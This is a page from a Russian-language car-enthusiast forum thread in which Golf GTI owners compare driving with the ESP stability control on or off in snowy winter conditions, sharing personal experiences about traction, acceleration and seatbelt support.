+ Ответить в теме
Страница 4 из 10 ПерваяПервая ... 2 3 4 5 6 ... ПоследняяПоследняя
Показано с 31 по 40 из 100

Тема: ESP при текущей погоде

GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Машина
    GTI V, VTG
    Цитата Сообщение от Chuka Посмотреть сообщение

Как же right hand-brake turn итд? Скучно!
    Да ладно, ESP не мешает таким поворотам или полицейскому, даже в самом активном состоянии.
    Вот разворот на 360 мне не дался и инструктор сказал что это из за остаткоа ESP

Добавлено через 5 минут
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Блин, камрады, вы меня реально пугаете........

Я уже и капитану Ясинскому позвонил провериться (он тоже выкл. ЕСП сейчас).

Макс, слава богу, отписался.

А то я уже начал считать себя полным отморозком.
    А у меня начинает появляться подозрение, что ESP на механике и автомате работает по разному. Также может влиять то, что ESP думает о резине и подвеске.
    В части разгона - у меня машина лучше разгоняется при включеной ESP. А вот в поврот иногда я вижу что мог бы зайти круче без нее, но не буду же я ее включать/выключать постоянно во время движения.
    Так что я езжу с ESP.

Добавлено через 9 минут
    Цитата Сообщение от constantinus Посмотреть сообщение
    Ну я тоже появилась эта привычка, сейчас вообще без ремня не могу - он то еще и в поворотах удерживает)
    да, я тоже привык что ремень служит точкой опоры для левого плеча, хотя уверен, что жто не правильно
    Последний раз редактировалось Scruj; 19.12.2009 в 15:57. Причина: Добавлено сообщение
    GTI - Get There Instantly (tm)

GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    "да, я тоже привык что ремень служит точкой опоры для левого плеча, хотя уверен, что жто не правильно"

вот вообще сейчас не понял.

что именно не правильно?

чем жестче ты закреплен к креслу, тем меньше ты прилагаешь усилий чтобы поддерживать свое в нем положение, таким образом все усилия можно направить непосредственно на рулежку.

т.о. лучше всего спортивные ремни, которые жестко крепят, за неимением таковых и как компромисс по комфорту пристегиваемся штатным инерционным ремнем.

читать все не осилил, скажу одно кто не первый день за рулем, то лучше ехать без есп
    3d,5d gti, s3

GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Машина
    GTI V, VTG
    Сегодня больше пробовал без ESP - таки да, в ряде случаев разгоняется лучше, так что сорри.
    GTI - Get There Instantly (tm)

GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Машина
    A4 Allroad
    Цитата Сообщение от Scruj Посмотреть сообщение
    Сегодня больше пробовал без ESP - таки да, в ряде случаев разгоняется лучше, так что сорри.
    Ну да , особенно на стоянке из сугроба выезжать лучше без ЕСП
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Машина
    VW Golf GTI Mk5 DSG
    А я в сегодняшний снегопад ехал с ЕСП (АСР)... Дискомфорта не испытывал :)
    С уважением, Василий.

My onboard video.

Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Машина
    GTI Overload
    Цитата Сообщение от VVZ Посмотреть сообщение
    А я в сегодняшний снегопад ехал с ЕСП (АСР)... Дискомфорта не испытывал :)
    Поддерживаю, я тоже :)

GTI-Racing maximus is on a distinguished road Аватар для maximus
    Машина
    golf V GTI
    блин, попробывал ездить с ЕСП, тупо застрял и машина перестала ехать...
    отключил нахрен и погрёб без проблем дальше....

Добавлено через 14 минут
    Цитата Сообщение от Scruj Посмотреть сообщение

А у меня начинает появляться подозрение, что ESP на механике и автомате работает по разному. Также может влиять то, что ESP думает о резине и подвеске.
    В части разгона - у меня машина лучше разгоняется при включеной ESP. А вот в поврот иногда я вижу что мог бы зайти круче без нее, но не буду же я ее включать/выключать постоянно во время движения.
    Так что я езжу с ESP.
    врядли, у меня механика, у Вани ДСГ.
    хотя можно будет сравнить где то на площадке...
    разве что ДСГ сама за тебя думает про крутящий момент и так далее, а на ручке ты сам себе хазяин.
    Последний раз редактировалось maximus; 21.12.2009 в 13:00. Причина: Добавлено сообщение

GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Машина
    RGTI
    По дороге думаю без разницы особой с ESP или без, просто надо правильно газ дозировать.

Я со двора выезжал - не мог выехать с ночного места (пригорок и бордюр) так там я отключил ESP, только как по мне не сильно помогло.

Эксперементировал опять таки ночью когдаснег валил - в субботу, так я особой разницы не заметил, просто без ESP авто может больше побуксовать))) а едут в приципе одинаково, но с ESP безопасней, меньше сносит корму.

Если ехать в трафике, то не будет выигрыша от отключенного ESP.

GTI-Racing maximus is on a distinguished road Аватар для maximus
    Машина
    golf V GTI
    Цитата Сообщение от constantinus Посмотреть сообщение
    По дороге думаю без разницы особой с ESP или без, просто надо правильно газ дозировать.

Я со двора выезжал - не мог выехать с ночного места (пригорок и бордюр) так там я отключил ESP, только как по мне не сильно помогло.

Эксперементировал опять таки ночью когдаснег валил - в субботу, так я особой разницы не заметил, просто без ESP авто может больше побуксовать))) а едут в приципе одинаково, но с ESP безопасней, меньше сносит корму.

Если ехать в трафике, то не будет выигрыша от отключенного ESP.
    это если разогнался, то можно и с ЕСП, а вот на разгоне без ЕСП удобней.
    Пы.Сы. Костя не обижай плиз больше с "правильной дозировкой газа"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!:woodpecker::woodpecker::woodpecker:

+ Ответить в теме
Страница 4 из 10 ПерваяПервая ... 2 3 4 5 6 ... ПоследняяПоследняя

Ваши права